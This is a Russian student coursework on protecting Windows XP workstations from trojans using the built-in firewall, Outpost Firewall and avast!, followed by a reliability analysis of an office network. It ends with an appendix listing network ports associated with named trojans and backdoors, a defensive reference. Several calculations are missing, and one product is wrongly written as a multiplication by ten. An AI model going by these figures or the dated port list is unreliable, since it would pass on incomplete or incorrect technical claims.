Способы защиты операционной системы от вирусных программ
Обоснование комплексной системы защиты информации на предприятии. Основные способы защиты операционной системы от программных закладок типа "троянский конь". Оценка эксплуатационных характеристик информационной системы. Основные показатели надежности.
Рубрика | Программирование, компьютеры и кибернетика |
Вид | курсовая работа |
Язык | русский |
Дата добавления | 12.08.2010 |
Размер файла | 2,7 M |
Отправить свою хорошую работу в базу знаний просто. Используйте форму, расположенную ниже
Студенты, аспиранты, молодые ученые, использующие базу знаний в своей учебе и работе, будут вам очень благодарны.
Исходя из этого защита от троянских программ должна быть комплексной, то есть включать средства, встроенные в операционную систему (встроенный брандмауэр), антивирусную программу и внешний брандмауэр.
2.6.1 Настройка встроенного брандмауэра Windows
Брандмауэр Windows по умолчанию включен, некоторыми возможностями ряда программ можно будет воспользоваться только после включения программы в список на вкладке Исключения брандмауэра Windows.
Таблица 4. параметры брандмауэра Windows по умолчанию
Доступ к настройкам брандмауэра Windows XP Service Pack 2 можно получить при помощи Пуск - Панель управления - брандмауэр Windows.
Рис.3 Пример окна с настройками брандмауэра
В этом окне можно включить или выключить брандмауэр для всех соединений с сетью. Пункт Не разрешать исключения активизирует режим работы брандмауэр, при котором брандмауэр не выводит на экран оповещений о блокировке и отключает список исключений, который можно задать на следующей вкладке окна управления брандмауэр.
Рис.4 Список исключений брандмауэра Windows
Брандмауэр разрешает входящие подключения для приложений, перечисленных в этом списке, если они отмечены флажком. Можно разрешить входящие подключения на определенный локальный порт, создав соответствующее правило. На следующей вкладке окна настроек брандмауэр собраны дополнительные настройки.
Рис.5. Дополнительные настройки брандмауэра Windows
Доступ к дополнительным настройкам брандмауэра можно получить на вкладке Дополнительно главного окна настройки брандмауэра (рис.5).
Параметры сетевого подключения - здесь перечислены все сетевые подключения, которые существуют на компьютере под защитой встроенного брандмауэра. Путем установки или снятия флажка напротив каждого из подключений можно включить или выключить брандмауэра для каждого из подключений. При помощи кнопки Параметры можно настроить параметры работы брандмауэра для каждого из подключений, если используется общий доступ к этому подключению.
Ведение журнала безопасности - при помощи кнопки Параметры можно настроить протоколирование событий, происходящих во время работы брандмауэра в журнале работы.
Протокол ICMP - позволяет настроить фильтрацию брандмауэра сообщений, которыми обмениваются по протоколу ICMP. В частности, можно запретить или разрешить отклик компьютера на команду ping.
Параметры по умолчанию - нажатие кнопки. По умолчанию возвращает все настройки брандмауэра к исходным.
Для данного брандмауэра характерен высокий уровень зашиты, так как сам брандмауэр включен и все исключения запрещены.
Встроенный в Windows XP SP2 файрвол достаточно надежен, но контролирует лишь входящие соединения, оставляя без внимания исходящие. Поэтому при использовании для защиты компьютера встроенного файрвола нужно быть очень внимательным при открытии файлов, полученных из сети. Вирус или шпионское программное обеспечение сможет без проблем отправить данные на сервер разработчика и пресечь его работу встроенный фаервол не сможет.
Изложенные выше рекомендации не являются исчерпывающим материалом по настройке безопасности операционной системы Windows XP Professional.
2.6.2 Настройка брандмауэра Outpost Firewall Pro
Outpost Personal Firewall - это персональный брандмауэр обеспечивающий: безопасность, конфиденциальность, контроль и легкость в использовании.
Agnitum Outpost Firewall имеет следующие основные функции:
Скрытый режим работы сделает компьютер под защитой файрвола невидимым в сети. Компьютер не будет откликаться на запросы о его существовании.
Гибкость в настройке фильтров позволяет указывать для конкретных приложений направление трафика (только отправлять данные в сеть, только получать, и отправлять и получать, запретить все).
Файрвол может блокировать рекламу, всплывающие окна, фильтровать содержимое посещаемых веб-страниц, запрещать доступ к сайтам, на которых встречаются определенные слова, что позволит оградить детей от просмотра порнографии или других нежелательных материалов.
Можно ограничивать или запрещать действия активных элементов в составе web-страниц, таких как Java-апплеты, ActiveX и Java-скрипты, которые могут использоваться для получения доступа к данным, хранящимся на компьютере или заражения его вирусами.
файрвол может блокировать cookies, которые многие сайты оставляют на компьютере с целью отследить перемещения пользователя в сети.
Предусмотрена блокировка почтовых вложений с целью защиты компьютера от заражения червями (черви - саморазмножающиеся, самораспространяющиеся вирусы).
Outpost Firewall следит за сетевой активностью, и в случае обнаружения начала атаки на компьютер выдает предупреждающее сообщение, блокируя трафик.
файрвол кэширует (сохраняет в своей базе) имена и IP-адреса посещенных сайтов, что позволяет при повторном их посещении избежать обращения к DNS-серверу провайдера. Это несколько ускоряет открытие посещенных ранее страниц.
Модульная структура программы позволяет добавлять новые модули, которые увеличивают возможности файрвола.
Outpost ведет журнал событий, куда сохраняются все события, происходившие во время работы.
Во время установки система запросит выбрать уровень безопасности
В нашем случае мы выбираем Обычный уровень
Рис.6. Выбор уровня безопасности фаервола Outpost
Далее нам необходимо определить, в каком из режимов будет работать наш фаервол:
1) в режиме автоматического (интеллектуального) создания правил для приложений
2) в режиме заранее подготовленных правил для приложений
В нашем случае мы выбрали автоматическое назначение правил (рис.7)
Рис. 7 Способ создания правил фаервола Outpost
Далее система автоматически выполняет, некоторые настройки программы.
После того, как программа установки закончит автонастройку, перезагружаем компьютер.
После перезагрузки компьютера, программа выполняет сканирование системы (рис.8).
Рис.8 Фаервол Outpost сканирует систему
Теперь рассмотрим основные пункты интерфейса программы.
Рис.9 Главное меню фаервола Outpost
1 - Сетевая активность.
Рис.10 Модуль "Сетевая активность" фаервола Outpost
В данном разделе можно увидеть активные соединения. (Имя процесса, Протокол, Локальный и удаленный адреса, порт и правила, которые действуют на данный тип соединения).
2 - Открытые порты.
Рис.11 модуль "Открытые порты" фаервола Outpost
В этом разделе мы видим порты которые открыты в нашей системе. Так же здесь отображаются правила, которые действуют на указанные порты.
3 - Anti-spyware.
Защита от spyware
Spyware (или шпионское программное обеспечение) является растущей проблемой, затрагивающей множество пользователей персональных компьютеров. Все чаще пользователи подвергаются атакам вредоносных программ (как правило, не зная об этом), которые собирают информацию о статистике посещений веб-страниц, установленных на компьютере приложениях и другие личные данные, которые затем отсылаются третьей стороне, spyware отслеживает действия пользователя без его на то согласия. Spyware могут изменять тексты почтовых сообщений, модифицировать содержимое файлов на жестком диске, показывать назойливые рекламные объявления, менять адрес домашней страницы вашего браузера. И, наконец, если всего вышеперечисленного оказалось недостаточно, резидентное spyware отнимает значительное количество системных ресурсов, иногда существенно снижая скорость работы вашего компьютера.
Подключаемый модуль Anti-Spyware создан для того, чтобы предупредить нежелательные и несанкционированные действия шпионских программ, избавиться от назойливой рекламы и защитить личные данные от похищения шпионскими программами и троянами.
4 - DNS.
Рис.12 Модуль "Служба доменных систем" фаервола Outpost
Управление кэшем DNS
В сети Интернет каждый компьютер имеет свой собственный номер. Это так называемый IP-адрес. Пример IP-адреса - 192.0.2.178. Просто достаточно набрать этот числовой ряд в строке ввода браузера, нажать клавишу Enter, и браузер перейдет к веб-страницам данного компьютера.
Компьютер может без труда запоминать числовые IP-адреса, чего нельзя сказать о человеке. Поэтому была придумана адресная система, использующая слова и буквы, которая получила название Служба доменных имен (Domain Name System, DNS). Для большинства пользователей имя DNS является более близким понятием, чем IP-адрес. Пример имени DNS - http://www.agnitum.ru.
Имена DNS намного легче запомнить, однако браузерам необходимо знать IP-адрес, чтобы передавать данные по cети. Поэтому в Интернет существуют базы данных, которые хранят информацию о том, какой IP-адрес соответствует определенному имени DNS. Иногда, чтобы найти соответствие IP-адреса и имени DNS, браузер обращается к нескольким базам данных, находящимся в разных местах сети Интернет, что часто требует времени.
Для ускорения процесса Outpost Firewall Pro создает и использует персонифицированную базу данных адресов DNS, хранащуюся на вашем компьютере. Она называется кэшем DNS (кэширование - запоминание) и вы можете настраивать ее по своему желанию.
Outpost Firewall Pro поддерживает кэширование DNS автоматически, согласно вашим настройкам, и запоминает адреса, которые вы недавно использовали. Время, необходимое для хранения DNS, зависит от значения, которое вы укажете в настройках модуля DNS. Оно также зависит от того, как много имен DNS должно хранится в памяти Outpost Firewall Pro. Сохраняются только недавно использованные имена с учетом максимального количества записей, указанного вами.
5 - детектор атак
Рис.13. Модуль "Детектор атак" фаервола Outpost
Предотвращение сетевых атак
Одним из важнейших аспектов защиты с помощью брандмауэра является фильтрация входящих пакетов, используемая для контроля входящей активности и блокировки хакеров и вредоносных программ при их попытке атаковать ваш компьютер.
Подключаемый модуль Детектор атак обнаруживает, предотвращает и оповещает вас обо всех возможных атаках на вашу систему из Интернета и локальной сети, к которой подключен ваш компьютер. Модуль просматривает входящие данные и определяет их законность либо с помощью сравнения контрольных сумм с известными атаками, либо производя анализ поведения. Это позволяет обнаруживать не только известные типы атак, такие как сканирование портов, Отказ от обслуживания (Denial of Service, DoS-атаки), атаки классов 'short fragments' и 'my address' и многие другие, но также и будущие угрозы.
6,7 - интерактивные элементы и реклама
Рис.14 Модуль "интерактивные элементы" фаервола Outpost
Блокировка рекламы
Все больше и больше интернет сайтов сегодня наполняются рекламой, иногда очень назойливой, изображениями спорного содержания, заполняющими страницы и замедляющими их загрузку.
Подключаемый модуль Реклама позволяет блокировать определенные рекламные объявления и баннеры, увеличивая таким образом скорость загрузки веб-страниц. Объявления могут блокироваться по двум критериям: по ключевым словам, найденным в содержимом загружаемой страницы, или по размеру рекламного изображения.
8 - содержимое.
Блокировка содержимого
Многие веб-сайты содержат сомнительное содержимое, множество заманчивых баннеров и ссылок приводят вас на страницы, содержащие информацию, нежелательную для просмотра вашими детьми.
Подключаемый модуль Содержимое избавляет вас от нежелательного содержимого, блокируя отображение указанных веб-сайтов или страниц, содержащих сомнительные материалы. Модуль Содержимое блокирует веб-страницы и сайты на основе ключевых слов, содержащихся в них и их URL, отображая в браузере указанное предупреждение каждый раз когда он пытается получить доступ к запрещенной странице.
9 - фильтрация почтовых вложений.
Фильтрация почтовых вложений
Одним из самых простых путей для червей, Троянов и прочих вредоносных программы попасть на ваш компьютер является электронная почта. Сотни самовоспроизводящихся программ используют для рассылок базы электронных адресов ничего не подозревающих пользователей. Стоит пользователю только запустить вложенный файл, как сетевой червь или вирус начинает выполнять вредоносные действия, инфицируя систему и заставляя ее нестабильно работать.
Подключаемый модуль Фильтрация почтовых вложений защищает вас от вложений, содержащих вирусы и сетевые черви, проверяя вложения входящих почтовых сообщений и отфильтровывая потенциально опасные. С помощью этого модуля вы можете автоматически переименовывать почтовые вложения, чтобы они не могли повредить вашему компьютеру, а также получать соответствующие оповещения. Каждый тип вложений может управляться индивидуально в зависимости от расширения файла.
Для редактирования или назначения правил перейдите на вкладку "Параметры" и выберите пункт "Приложения".
В открывшемся окне мы видим 3 группы, на которые программа делит все установленные приложения.
1) запрещенные приложения
Все приложения, которые будут находиться в данной группе, будут заблокированы фаерволом и не смогут получить никакого доступа к локальной сети или сети Интернет.
2) пользовательский уровень
Все приложения, которые находятся в данной группе, подчиняются назначенным правилам. Для просмотра или редактирования правил выделите интересующее приложение и нажмите кнопку "изменить" на правой панели окна, в открывшемся меню выбираем "редактировать правила"…
3) разрешенные приложения
Все приложения находящиеся в данной группе, никак не блокируются и получают свободный доступ к локальной сети и сети Интернет.
Рис.15 Параметры фаервола Outpost
Режимы работы:
разрешать
Работая в этом режиме, Outpost будет разрешать все входящие и исходящие соединения, которые явно не запрещены правилами.Т. е. если в конфигурации нет четко прописанного правила для приложения или узла, то оно может выполнять любые действия в системе.
режим обучения
режим обучения
Работая в этом режиме, Outpost будет отслеживать активность приложений и узлов в сети, Т.о. при попытке какого-либо приложения установить соединении, Outpost отреагирует на это событие и либо создаст правило на основе предустановок, либо запросит у пользователя какое действие необходимо выполнить.
Outpost имеет в своей базе некие шаблоны на основе которых он и выстраивает правила ля определенных приложений.
Блокировать
Блокировать все приложения, которые явно не разрешены в конфигурации фаервола. Противоположен первому режиму работы программы.
Работа в Режиме внутренней защиты
Так как средства защиты от вредоносного программного обеспечения становятся все мощнее, хакеры стали пытаться отключать их, используя руткиты (rootkits) и другие утилиты, перед тем как совершать свои несанкционированные действия. Чтобы противостоять этой угрозе, Outpost Firewall Pro предлагает так называемый Режим внутренней защиты. С включенной внутренней защитой Outpost Firewall Pro охраняет себя от остановки вирусами, троянами или шпионским программным обеспечением.
В целом фаервол Outpost Firewall Pro выполняет функции, возложенные на него. Защита компьютера от проникновения обеспечена на должном уровне. Модули работают без проблем. Автоматическое обновление программы снимает с легального пользователя необходимость отслеживать выход новых версий и обновлений программы. Объем занимаемых программой ресурсов весьма скромен. Работа файрвола практически не сказывается на скорости сети и делает работу безопасной, предохраняя компьютер от проникновения некоторых типов вирусов, вредоносных скриптов и атак.
2.6.3 Настройка антивируса avast! Antivirus
Avast Antivirus Professional - антивирус, способный обнаружить большое количество известных вирусов, а также неизвестную деятельность и самомодифицирующиеся вирусы, для которых не возможно прямое обнаружение.
Основные характеристики:
Высокий уровень выявления вирусов, троянов и червей.
Резидентный (в режиме реального времени) и обычный сканер.
Сканирование архивов.
Проверка входной и исходной электронной почты.
Глубокая интеграция в систему. Проверить тот или иной файл возможно непосредственно из проводника Windows, щелкнув по нему правой кнопкой мыши и избрав надпись "Сканировать..."
Карантин изолирован от операционной системы, что обеспечивает большую безопасность работы. Ни один файл, сохраняемый в карантине не может быть запущен.
минимальным числом ложных срабатываний
Большое количество настроек.
Рис.16 главное меню программы Avast Antivirus
Программа Avast Antivirus позволяет выбирать необходимые области сканирования - локальные диски, сменные носители или выбранные папки. Есть возможность настройки резидентной защиты: оключена, обычный или высокий уровень. Выбираем высокий уровень резидентной защиты.
Существует возможность выбора типа сканирования: эксресс-сканирование, обычное сканирование, полное сканирование. Выбираем пункт "полное сканирование" (рис.17):
Рис.17 Определение типа сканирования
Для проверки правильности функционирования данной программы запустим троянскую программу Hooker, trojan module v2. x, текст которой описан в приложении. Резидентный сканер выдаёт сообщения об обнаружении трояна (рис. 19):
Рис.18 пример работы Avast Antivirus
Рис. 19 Резидентный сканер выдаёт сообщения об обнаружении трояна
Также программа позволяет обновлять антивирусные базы (частое обновление антивирусной системы является обязательным), обеспечивает автоматическое обновление через Интернет вирусных баз данных или даже самой программы.
К недостатки данной программы можно отнести следующие:
При включении резидентной защиты высокого уровня и полного сканирования производительность компьютера резко снижается;
Необходимость обновления антивирусных баз;
Невозможность лечить заражённых файлы: возможно либо удалить зараженные файлы, либо поместить их в вирусное хранилище.
Мощный резидентный модуль Avast! способен обнаружить вирус прежде, чем он заразит компьютер. Особенность новой версии программы - эвристический анализ почтовых сообщений. Это очень полезно для защиты от новых, неизвестных вирусов и червей, которых нельзя обнаружить обычными средствами. Эвристический модуль тщательно изучает каждое почтовое сообщение и наблюдает за подозрительными признаками, которые могли бы выявить присутствие вируса. Когда число этих признаков превышает определяемый пользователем порог, сообщение считают опасным, и пользователь получает предупреждение.
Глава 3. Оценка эксплуатационных характеристик информационной системы
3.1 Описание критерия надёжности
Процесс эксплуатации любого объекта складывается из следующих этапов: выбор объекта по назначению, покупка объекта, транспортировка и хранение, монтаж и подключение, использование по назначению и техническое обслуживание, демонтаж и утилизация объекта.
В процессе эксплуатации технических средств может произойти отказ в выполнении их функций, так как безотказных объектов не существует. Отказ - нарушение работоспособности технического объекта вследствие недопустимого изменения его параметров или свойств под влиянием внутренних физико-химических процессов и внешних механических, климатических или иных воздействий.
Информационная система предприятия включает в свой состав локальную вычислительную сеть, подключенную к глобальной сети Internet. В конкретной локальной сети, предназначенной для подготовки, обработки, хранения информации и обмена информацией с удаленными информационными системами, может отказать одна из составных частей, что приведёт к отказу всей системы. Поэтому необходимо уменьшить вероятность отказа всей системы из-за отказа отдельных частей.
Одним из способов уменьшения вероятности отказа является применение системы с резервированием.
Система с резервированием - это система с избыточностью элементов, т.е. с резервными составляющими, избыточными по отношению к минимально необходимой (основной) структуре и выполняющими те же функции, что и основные элементы. Различают общее и поэлементное (раздельное) резервирование. По виду резервирование подразделяют на:
активное (нагруженное) - резервные элементы функционируют наравне с основными (постоянно включены в работу);
пассивное (ненагруженное) - резервные элементы вводятся в работу только после отказа основных элементов (резервирование замещением).
На практике применяют облегченное и скользящее резервирование. Облегчённый резерв - подключение резервных элементов к цепям питания для прогрева и удержания требуемых значений параметров; внешние нагрузки и воздействия, приводящие к изменению свойств материалов, рабочих параметров и т.п. При скользящем резервировании резервный элемент может быть включен взамен любого из отказавших элементов основной системы.
На этапе испытаний и эксплуатации проводятся расчеты надежности технической системы для оценки количественных показателей надежности
Надежность - свойство объекта выполнять заданные функции, сохраняя во времени и в заданных пределах значения установленных эксплуатационных показателей.
Объектами могут быть различные системы и их элементы.
Надежность объекта характеризуется следующими основными состояниями и событиями:
Исправность - состояние объекта, при котором он соответствует всем требованиям, установленным нормативно-технической документацией (НТД).
Работоспособность - состояние объекта, при котором он способен выполнять заданные функции, сохраняя значения основных параметров, установленных НТД.
Основные параметры характеризуют функционирование объекта при выполнении поставленных задач.
Понятие исправность шире, чем понятие работоспособность. Работоспособный объект обязан удовлетворять лишь тем требования НТД, выполнение которых обеспечивает нормальное применение объекта по назначению. Таким образом, если объект неработоспособен, то это свидетельствует о его неисправности. С другой стороны, если объект неисправен, то это не означает, что он неработоспособен.
Предельное состояние - состояние объекта, при котором его применение по назначению недопустимо или нецелесообразно.
Применение (использование) объекта по назначению прекращается в следующих случаях:
при неустранимом нарушении безопасности;
при неустранимом отклонении величин заданных параметров;
при недопустимом увеличении эксплуатационных расходов.
Для некоторых объектов предельное состояние является последним в его функционировании, т.е. объект снимается с эксплуатации, для других - определенной фазой в эксплуатационном графике, требующей проведения ремонтно-восстановительных работ.
В связи с этим, объекты могут быть:
невосстанавливаемые, для которых работоспособность в случае возникновения отказа, не подлежит восстановлению;
восстанавливаемые, работоспособность которых может быть восстановлена, в том числе и путем замены.
В ряде случаев один и тот же объект в зависимости от особенностей, этапов эксплуатации или назначения может считаться восстанавливаемым или невосстанавливаемым.
Отказ - событие, заключающееся в нарушении работоспособного состояния объекта.
Критерий отказа - отличительный признак или совокупность признаков, согласно которым устанавливается факт возникновения отказа.
Надежность является комплексным свойством, включающим в себя в зависимости от назначения объекта или условий его эксплуатации ряд простых свойств:
безотказность;
долговечность;
ремонтопригодность;
сохраняемость.
Безотказность - свойство объекта непрерывно сохранять работоспособность в течение некоторой наработки или в течение некоторого времени.
Долговечность - свойство объекта сохранять работоспособность до наступления предельного состояния при установленной системе технического обслуживания и ремонтов.
Ремонтопригодность - свойство объекта, заключающееся в его приспособленности к предупреждению и обнаружению причин возникновения отказов, поддержанию и восстановлению работоспособности путем проведения ремонтов и технического обслуживания.
Сохраняемость - свойство объекта непрерывно сохранять требуемые эксплуатационные показатели в течение (и после) срока хранения и транспортирования.
В зависимости от объекта надежность может определяться всеми перечисленными свойствами или частью их. Например, надежность колеса зубчатой передачи, подшипников определяется их долговечностью, а станка - долговечностью, безотказностью и ремонтопригодностью.
3.2 Основные показатели надежности
Показатель надежности количественно характеризует, в какой степени данному объекту присущи определенные свойства, обусловливающие надежность. Одни показатели надежности (например, технический ресурс, срок службы) могут иметь размерность, ряд других (например, вероятность безотказной работы, коэффициент готовности) являются безразмерными.
Наиболее важные показатели надежности невосстанавливаемых объектов - показатели безотказности, к которым относятся:
вероятность безотказной работы;
плотность распределения отказов;
интенсивность отказов;
средняя наработка на отказ
Вероятность безотказной работы - отношением числа N (t) объектов, безотказно проработавших до момента наработки t, к числу объектов, исправных к началу испытаний (t = 0) - к общему числу объектов N. Оценку ВБР можно рассматривать как показатель доли работоспособных объектов к моменту наработки t.
Плотность распределения отказов - отношением числа объектов n (t, t + t), отказавших в интервале наработки [t, t + t] к произведению общего числа объектов N на длительность интервала наработки t.
Интенсивность отказов - отношением числа объектов n (t, t + t), отказавших в интервале наработки [t, t + t] к произведению числа N (t) работоспособных объектов в момент t на длительность интервала наработки t.
Средняя наработка на отказ - среднее значение наработки ремонтируемого изделия между отказами (нарушениями его работоспособности)
Задача расчета надежности - определение показателей безотказности системы, состоящей из невосстанавливаемых элементов, по данным о надежности элементов и связях между ними.
Цель расчета надежности:
обосновать выбор того или иного конструктивного решения;
выяснить возможность и целесообразность резервирования;
выяснить, достижима ли требуемая надежность при существующей технологии разработки и производства.
Работоспособность системы обеспечивается при условии, когда все n элементов системы находятся в работоспособном состоянии, то есть отказ одного элемента приводит к отказу всей системы. Если это условие выполняется, то получаем схему надёжности системы с последовательным соединением элементов.
Рис.20 Схема надёжности с последовательным соединением элементов.
3.3 Построение структурной схемы надёжности локальной вычислительной сети информационно - рекламного отдела
Локальная вычислительная сеть информационно - рекламного отдела состоит из 10 рабочих станций, коммутатора, сетевого принтера и модема.
Рис.21 Локальная вычислительная сеть информационно - рекламного отдела
3.4 Логическая схема надёжности локальной вычислительной сети информационно - рекламного отдела
В логической схеме надёжности локальной вычислительной сети информационно - рекламного отдела элементы соединены последовательно. Отказ любого элемента приводит к отказу всей системы.
Рис.22 Схема надёжности локальной вычислительной сети информационно - рекламного отдела
3.5 Оптимизация структуры локальной вычислительной сети информационно - рекламного отдела с учётом характеристик надёжности её элементов
Исходные данные:
Pбр - вероятность безотказной работы
qПК - вероятность отказа персонального компьютера (qПК1 = qПК2 = qПК3 = … = qПК10)
qМ - вероятность отказа модема
qПр - вероятность отказа сетевого принтера
qК - вероятность отказа коммутатора
pПК - вероятность безотказной работы персонального компьютера (рПК1 = рПК2 =рПК3 = … = рПК10)
pМ - вероятность безотказной работы модема
pПр - вероятность безотказной работы сетевого принтера
pК - вероятность безотказной работы коммутатора
MTBF - средняя наработка до отказа
t - время наблюдения (измеряется в годах в годах)
MTBFпк - средняя наработка до отказа персонального компьютера
MTBFпк1 = MTBFпк2 = MTBFпк3 =…= MTBFпк10
MTBFпр - средняя наработка до отказа сетевого принтера
MTBFк - средняя наработка до отказа коммутатора
MTBFм - средняя наработка до отказа модема
t = 6 месяцев
года
года
года
года
года
пк - интенсивность отказов персональных компьютеров пк =1пк2 =пк3 =…= пк10
м - интенсивность отказов модема
пр - интенсивность отказов сетевого принтера
к - интенсивность отказов коммутатора
Определим интенсивность отказов:
отказов / год
отказов / год
отказов / год
отказов / год
Рпк - вероятности безотказной работы персонального компьютера
Рпк 1 = Рпк 2 = Рпк 3 = … = Рпк 10
Рк - вероятности безотказной работы коммутатора
Рпр - вероятности безотказной работы сетевого принтера
Рм - вероятности безотказной работы модема
Определим вероятности безотказной работы элементов:
Определим вероятность безотказной работы локальной вычислительной сети:
Определим показатель эффективности локальной вычислительной сети:
Фэ = (1-qi)
qi = Pi
Фэ = Pпк1*Рпк2* Pпк3*Рпк4* Pпк5*Рпк6* Pпк7*Рпк8* Pпк9*Рпк10* Pк*Рм*Рпр = Р
Фэ = 10*Pпк1* Pк*Рм*Рпр = Р
Фэ = 0.153
Получили низкое значение эффективности показателя эффективности, следовательно необходимо синтезировать такую структуру системы, чтобы обеспечить максимизацию функции эффективности. Эта задача решается метолом пошаговой оптимизации (или градиентного метода). Для этого составляется таблица, где i - номер элемента, ai = pi * qi, ni - количество резервных элементов i - того типа, Фэ= (1-аi)
Таблица 5 Реализация пошагового метода оптимизации.
№ ша-га |
i |
пк1 |
пк2 |
пк3 |
пк4 |
пк5 |
пк6 |
пк7 |
пк8 |
пк9 |
пк10 |
коммутатор |
сетевой принтер |
модем |
Фэ |
|
pi |
0,88 |
0,88 |
0,88 |
0,88 |
0,88 |
0,88 |
0,88 |
0,88 |
0,88 |
0,88 |
0,882 |
0,779 |
0,78 |
|||
qi |
0,12 |
0,12 |
0,12 |
0,12 |
0,12 |
0,12 |
0,12 |
0,12 |
0,12 |
0,12 |
0,118 |
0,221 |
0,22 |
|||
1 |
ni |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
0,15 |
|
ai |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1041 |
0,17216 |
0,17 |
|||
2 |
ni |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
2 |
1 |
0,24 |
|
ai |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1041 |
0,03805 |
0,17 |
|||
3 |
ni |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
1 |
2 |
2 |
0,28 |
|
ai |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1 |
0,1041 |
0,03805 |
0,04 |
Использование резервных элементов позволяют увеличить значение функции эффективности до необходимого значения.
Таким образом метод пошаговой оптимизации позволяет обосновать характеристики оптимальной структуры системы с предположением, что все элементы включены и постоянно работают, отказ одного элемента приведёт к отказу всей системы. В теории надёжности такая система получила название системы с основными элементами и резервными элементами, находящимися в горячем резерве.
Заключение
Основной целью атаки рабочей станции является, конечно, получение данных, обрабатываемых, либо локально хранимых на ней. А основным средством подобных атак до сих пор остаются "троянские" программы.
Троянские программы - одна из наиболее опасных угроз безопасности компьютерных систем. Радикальным способом защиты от этой угрозы является создание замкнутой среды исполнения программ. Никакая другая программа с такой большой вероятностью не приводит к полной компрометации системы, и ни одна другая программа так трудно не обнаруживается.
Троянским конем может быть программа, которая делает что-то полезное, или просто что-то интересное. Она всегда делает что ни будь неожиданное, подобно захвату паролей или копированию файлов без ведома пользователя.
Основная задача большинства троянских программ состоит в выполнении действий, позволяющих получить доступ к данным, которые не подлежат широкой огласке (пользовательские пароли, регистрационные номера программ, сведения о банковских счетах и т.д.) Кроме того, троянцы могут причинять прямой ущерб компьютерной системе путем приведения ее в неработоспособное состояние.
Значительно большую угрозу представляют троянцы, входящие в состав распространенных компьютерных приложений, утилит и операционных систем. Обнаружить такие программы удается чисто случайно. Программное обеспечение, частью которого они являются, в большинстве случаев используется не только какой-то одной компанией, закупившей это программное обеспечение, но и устанавливается на крупные правительственные и образовательные Internet-серверы, распространяется через Internet, а потому последствия могут быть самыми плачевными.
Таким образом, троянские программы встречаются довольно часто и, следовательно, представляют серьезную угрозу безопасности компьютерных систем. Большинство троянцев являются частью других программ, которые хранятся в компьютере в откомпилированном виде. Текст этих программ не предназначен для восприятия человеком и представляет собой последовательность команд на машинном языке, состоящую из нулей и единиц. Рядовой пользователь, как правило, не имеет ни малейшего понятия о внутренней структуре таких программ. Он просто запускает их на исполнение путем задания имени соответствующей программы в командной строке или двойным нажатием "мыши", наставляя ее указатель на эту программу.
Даже после того, как троянская программа обнаружена, ее вредоносное влияние на компьютерную систему может ощущаться еще в течение очень длительного времени. Зачастую никто не может с уверенностью сказать, насколько сильно была скомпрометирована компьютерная система присутствием в ней троянской программы
В связи с этим для защиты информации, хранящейся на персональных компьютерах, от троянских программ необходимо использовать комплекс программ, например, встроенный брандмауэр Windows, внешний фаервол и антивирусную программ. Использование лишь одного из указанных средств не даст необходимого уровня защищённости информационной системы.
Библиографический список
1. Д. Макнамара Секреты компьютерного шпионажа: Тактика и контрмеры. Пер. с англ; под ред.С.М. Молявко. - М.: БИНОМ. Лаборатория знаний, 2004. - 536 с
2. Мак-Клар, Стюарт, Скембрей, Джоел, Курц, Джордж. Секреты хакеров. Безопасность сетей - готовые решения, 3-е издание.: Пер. с англ. - М.: Издательский дом "Вильяме", 2002.
3. М. Руссинович, Д. Соломон Внутреннее устройство Windows: Windows Server 2003, Windows XP и Windows 2000:...4-е изд. Пер. с англ. - М.: Издательско-торговый дом "Русская Редакция", 2005г.992
4. Харви М. Дейтел, Дейтел П. Дж., Чофнес Д.Р. Операционные системы. Распределенные системы, сети, безопасность -М.: Бином. Лаборатория знаний, 2006
5. Вебер К., Бадур Г. Безопасность в Windows XP. Готовые решения сложных задач защиты компьютеров. - М.: Diasoft, 2003, 464 с.
6. Хатч, Брайан, Ли, Джеймс, Курц, Джордж Секреты хакеров. Безопасность Linux - готовые решения, 2-е издание, - М.: Издательский дом "Вильямс", 2004, 704 с
7. Скудис Э. Противостояние хакерам: Пошаговое руководство по компьютерным атакам и эффективной защите: Пер. с англ., - М.: ДМК-Пресс, 2003, 512 с
8. http://www.bezpeka.com/ru/news/2005/07/22/4850.html
9. http://www.safensoft.ru/safensec/personal/
10. http://www.xndits.ru/index. php? module=articles&c=articles&b=1&a=32
11. http://www.kuban.ru/help/troyan. htm
12. www.cnews.ru
13. www.viruslist.comruvirusesencyclopediavirusid=34631
14. ru. wikipedia.org
15. http://www.tehnostar.com/newshard/16085.html
16. http://www.hackzona.ru/hz. php? name=News&file=article&sid=3262
17. http://www.compress.ru/Archive/CP/2006/3/81/
Приложение 1
Список портов, используемых троянскими программами:
port 21 - Back Construction, Blade Runner, Doly Trojan, Fore, FTP trojan, Invisible FTP, Larva, MBT, Motiv, Net Administrator, Senna Spy FTP Server, WebEx, WinCrash
port 23 - Tiny Telnet Server, Truva Atl
port 25 - Aji, Antigen, Email Password Sender, Gip, Happy 99, I Love You, Kuang 2, Magic Horse, Moscow Email Trojan, Naebi, NewApt, ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy
port 31 - Agent 31, Hackers Paradise, Masters Paradise port 41 - DeepThroat
port 48 - DRAT port 50 - DRAT
port 59 - DMSetup port 79 - Firehotcker
port 80 - Back End, Executor, Hooker, RingZero port 99 - Hidden Port
port 110 - ProMail trojan port 113 - Invisible Identd Deamon, Kazimas
port 119 - Happy 99 port 121 - JammerKillah
port 123 - Net Controller port 133 - Farnaz, port 146 - Infector
port 146 (UDP) - Infector port 170 - A-trojan
port 421 - TCP Wrappers port 456 - Hackers Paradise
port 531 - Rasmin
port 555 - Ini-Killer, NeTAdministrator, Phase Zero, Stealth Spy
port 606 - Secret Service
port 666 - Attack FTP, Back Construction, NokNok, Cain & Abel, Satanz Backdoor, ServeU, Shadow Phyre
port 667 - SniperNet port 669 - DP Trojan
port 692 - GayOL port 777 - Aim Spy
port 808 - WinHole port 911 - Dark Shadow
port 999 - DeepThroat, WinSatan port 1000 - Der Spacher 3
port 1001 - Der Spacher 3, Le Guardien, Silencer, WebEx
